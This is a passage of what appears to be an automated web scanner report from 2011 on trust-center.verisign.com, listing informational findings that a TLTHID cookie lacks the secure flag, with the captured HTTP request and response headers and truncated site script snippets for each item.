User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:42 GMT
Server: Apache
Set-Cookie: TLTHID=69307022DB2A10DB4D009F6CAED9DACC; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:06 GMT
Accept-Ranges: bytes
Content-Length: 597
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif


6.37. https://trust-center.verisign.com/rcm/verisign/images/truste.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/images/truste.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=6860A20CDB2A10DB4CFF9F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/truste.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:40 GMT
Server: Apache
Set-Cookie: TLTHID=6860A20CDB2A10DB4CFF9F6CAED9DACC; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:06 GMT
Accept-Ranges: bytes
Content-Length: 2232
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif


6.38. https://trust-center.verisign.com/rcm/verisign/images/tsTermArrow.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/images/tsTermArrow.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=677EA4F6DB2A10DB6A7ECEC4D1E75D2A; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/tsTermArrow.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:39 GMT
Server: Apache
Set-Cookie: TLTHID=677EA4F6DB2A10DB6A7ECEC4D1E75D2A; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:06 GMT
Accept-Ranges: bytes
Content-Length: 71
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif


6.39. https://trust-center.verisign.com/rcm/verisign/images/tsTermBgM.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/images/tsTermBgM.jpg

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=677EB162DB2A10DB6A80CEC4D1E75D2A; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/tsTermBgM.jpg HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:39 GMT
Server: Apache
Set-Cookie: TLTHID=677EB162DB2A10DB6A80CEC4D1E75D2A; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:07 GMT
Accept-Ranges: bytes
Content-Length: 956
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/jpeg


6.40. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtB.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/images/tsTermWtB.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=67861F74DB2A10DB6A81CEC4D1E75D2A; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/tsTermWtB.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:39 GMT
Server: Apache
Set-Cookie: TLTHID=67861F74DB2A10DB6A81CEC4D1E75D2A; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:06 GMT
Accept-Ranges: bytes
Content-Length: 978
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif


6.41. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtT.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/images/tsTermWtT.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=677CD43CDB2A10DB4CF39F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/tsTermWtT.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:39 GMT
Server: Apache
Set-Cookie: TLTHID=677CD43CDB2A10DB4CF39F6CAED9DACC; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:06 GMT
Accept-Ranges: bytes
Content-Length: 997
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif


6.42. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtT.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/images/tsTermWtT.jpg

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=677EAADCDB2A10DB6A7FCEC4D1E75D2A; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/tsTermWtT.jpg HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:39 GMT
Server: Apache
Set-Cookie: TLTHID=677EAADCDB2A10DB6A7FCEC4D1E75D2A; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:07 GMT
Accept-Ranges: bytes
Content-Length: 876
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/jpeg


6.43. https://trust-center.verisign.com/rcm/verisign/images/webtrust.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/images/webtrust.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=685CA56CDB2A10DB44B7B1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/webtrust.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:40 GMT
Server: Apache
Set-Cookie: TLTHID=685CA56CDB2A10DB44B7B1847A7DDBAF; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:06 GMT
Accept-Ranges: bytes
Content-Length: 2221
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

...[SNIP]...

6.44. https://trust-center.verisign.com/rcm/verisign/scripts/account_signin.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/scripts/account_signin.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/account_signin.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:34 GMT
Server: Apache
Set-Cookie: TLTHID=64AF4CEEDB2A10DB44ABB1847A7DDBAF; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 741
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript


function lost_password(formName,referrerPath,username){var form=document.forms[formName];var usernameObj=getElement(username);form.action="/process/retail/account_lost_password?username="+escape(user
...[SNIP]...

6.45. https://trust-center.verisign.com/rcm/verisign/scripts/chat_support.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/scripts/chat_support.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/chat_support.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:37 GMT
Server: Apache
Set-Cookie: TLTHID=66684BA8DB2A10DB4CF19F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 423
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript


function agents_available(onclickLink,imgLink){var sb=document.getElementById('smartbutton');if(sb){sb.innerHTML='<A HREF="" onClick="window.open(\''+onclickLink+'\',\'custclient\',\'width=500,height
...[SNIP]...

6.46. https://trust-center.verisign.com/rcm/verisign/scripts/default.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/scripts/default.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/default.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:34 GMT
Server: Apache
Set-Cookie: TLTHID=649170C0DB2A10DB4CEA9F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 2794
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript


function initGoogleAnalytics(){_uacct="UA-230424-1";urchinTracker();}
function clearButtonSubmits(){if(document.forms){for(var i=0,l=document.forms.length;i<l;i++){if(document.forms[i].button_back){d
...[SNIP]...

6.47. https://trust-center.verisign.com/rcm/verisign/scripts/oo_conf_en-US_inline.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/scripts/oo_conf_en-US_inline.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/oo_conf_en-US_inline.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:36 GMT
Server: Apache
Set-Cookie: TLTHID=659B664CDB2A10DB44AFB1847A7DDBAF; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 1674
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript

/* OnlineOpinion v4.1.7 */
/* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. 6606581, 6421724, 6785717 B1 and other patents pending. */

/* Create new OnlineOpini
...[SNIP]...

6.48. https://trust-center.verisign.com/rcm/verisign/scripts/oo_engine_c.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/scripts/oo_engine_c.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/oo_engine_c.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:35 GMT
Server: Apache
Set-Cookie: TLTHID=65897DECDB2A10DB4CEE9F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 28368
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript

/* OnlineOpinion v4.1.7 */
/* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. 6606581, 6421724, 6785717 B1 and other patents pending. */
var OnlineOpinion=new Ob
...[SNIP]...

6.49. https://trust-center.verisign.com/rcm/verisign/scripts/popup.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/scripts/popup.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

